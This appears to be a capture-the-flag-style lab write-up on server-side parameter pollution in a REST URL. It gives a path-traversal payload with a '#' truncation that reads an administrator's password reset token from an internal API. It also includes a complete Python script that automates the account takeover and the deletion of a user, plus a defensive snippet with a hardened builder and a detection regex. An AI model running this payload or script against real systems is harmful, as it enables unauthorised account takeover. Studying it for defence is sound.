5. Exploiting server-side parameter pollution in a REST URL
Open the vulnerable application:

Let's navigate through the web application:


Forgot password:




Let's go to Burp Suite:

Send it to Repeater and add a # to it:

Let's try a path traversal sequence on it:

It says "invalid route", so this could be RESTful URL path parameter pollution.
Let's find out.
I asked ChatGPT what the name of the documentation file for a RESTful API is:

Let's try openapi.json first:

Here we go, we found the internal API, and username is a path parameter. Let's find out whether we can access a field like in the previous lab:
And, like in the previous lab, there is an email field whose value we can access:

And according to the forgotPassword.js file in the Burp Suite history, we have to find the PasswordResetToken to reset the administrator password:

Let's try to get it:
It errors and says that this version of the API only supports the email value:


As a previous screenshot showed, the API version is 2, so let's try changing it to v1.
That means we have to path traverse back to /internal and set the version to v1:
../../v1/users/administrator/field/passwordResetToken%23
And here we go, we got the token:
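To see why that payload works, here is an added example (not from the lab or this writeup) that models how a back end might build the internal API path from the username field; the base path, field suffix and username allowlist are assumptions. The hardened builder shows the fix, and the last function is a log/WAF check for the same pattern.

```python
import posixpath
import re
from urllib.parse import quote

# Assumed internal layout, modelled on the v1/v2 paths seen in the writeup (constructed).
INTERNAL_BASE = "/api/internal/v2/users/"
FIELD_SUFFIX = "/field/email"


def build_vulnerable(username):
    """Raw concatenation: the value can add path segments, '..' climbs out of
    /v2/users/, and everything after '#' is dropped as a URL fragment before
    the internal request is sent."""
    raw = INTERNAL_BASE + username + FIELD_SUFFIX
    path = raw.split("#", 1)[0]
    return posixpath.normpath(path)


def build_hardened(username):
    """Allowlist the value, then percent-encode it so it can only ever be a
    single path segment (no '/', '..' or '#' survives)."""
    if not re.fullmatch(r"[A-Za-z0-9_.-]{1,64}", username) or ".." in username:
        raise ValueError("invalid username")
    return INTERNAL_BASE + quote(username, safe="") + FIELD_SUFFIX


def looks_like_parameter_pollution(value):
    """Detection helper for request logs or a WAF rule: flags values carrying
    traversal or truncation characters, raw or URL-encoded."""
    return re.search(r"(\.\./|%2e%2e|#|%23|%2f)", value, re.IGNORECASE) is not None
```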

Let's go reset it using the path mentioned in the forgotPassword.js file:
/forgot-password?passwordResetToken=<token we found>
And here we go:

After changing the password:


Let's navigate to the admin panel and delete the carlos user to solve this lab:

And yup, we finally solved the lab:

Solving it using a Python 3 script:

```python
import requests
import re
import os
import sys
import json

# Send everything through Burp Suite so the requests show up in the proxy history.
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}
session = requests.session()


def Login(username, password):
    print("[*] Get CSRF Token.")
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "login", proxies=proxies, verify=False).text)
    print("[*] Logging In.")
    data = f"csrf={csrf[0]}&username={username}&password={password}"
    session.post(url=url + "login", data=data, allow_redirects=True, proxies=proxies, verify=False)


def GetToken():
    print("[*] Get Administrator Token.")
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "forgot-password", proxies=proxies, verify=False).text)
    # A normal reset request first, so the application generates a token for administrator.
    data1 = f"csrf={csrf[0]}&username=administrator"
    session.post(url=url + "forgot-password", data=data1, proxies=proxies, verify=False)
    # Traverse from /v2/users/ up to /v1/ and read the passwordResetToken field;
    # %23 (#) truncates whatever the server appends after our value.
    data2 = f"csrf={csrf[0]}&username=../../v1/users/administrator/field/passwordResetToken%23"
    result = json.loads(session.post(url=url + "forgot-password", data=data2, proxies=proxies, verify=False).text)
    return result["result"]


def ChangePass(token):
    print("[*] Change Administrator Password.")
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + f"forgot-password?passwordResetToken={token}", proxies=proxies, verify=False).text)
    data = f"csrf={csrf[0]}&passwordResetToken={token}&new-password-1=Caesar3&new-password-2=Caesar3"
    session.post(url=url + f"forgot-password?passwordResetToken={token}", data=data, allow_redirects=True, proxies=proxies, verify=False)


def DeleteCarlos():
    print("[*] Login As Administrator.")
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "login", proxies=proxies, verify=False).text)
    data = f"csrf={csrf[0]}&username=administrator&password=Caesar3"
    session.post(url=url + "login", data=data, allow_redirects=True, proxies=proxies, verify=False)
    print("[*] Delete The User Carlos.")
    session.post(url=url + "admin/delete?username=carlos", allow_redirects=True, proxies=proxies, verify=False)


if __name__ == "__main__":
    if len(sys.argv) != 2:
        script_name = os.path.basename(__file__)
        print(f"[-] Usage: python {script_name} http://localhost/")
        sys.exit(1)
    url = sys.argv[1]
    Login("wiener", "peter")
    token = GetToken()
    ChangePass(token)
    DeleteCarlos()
    print("[+] Solved.")
```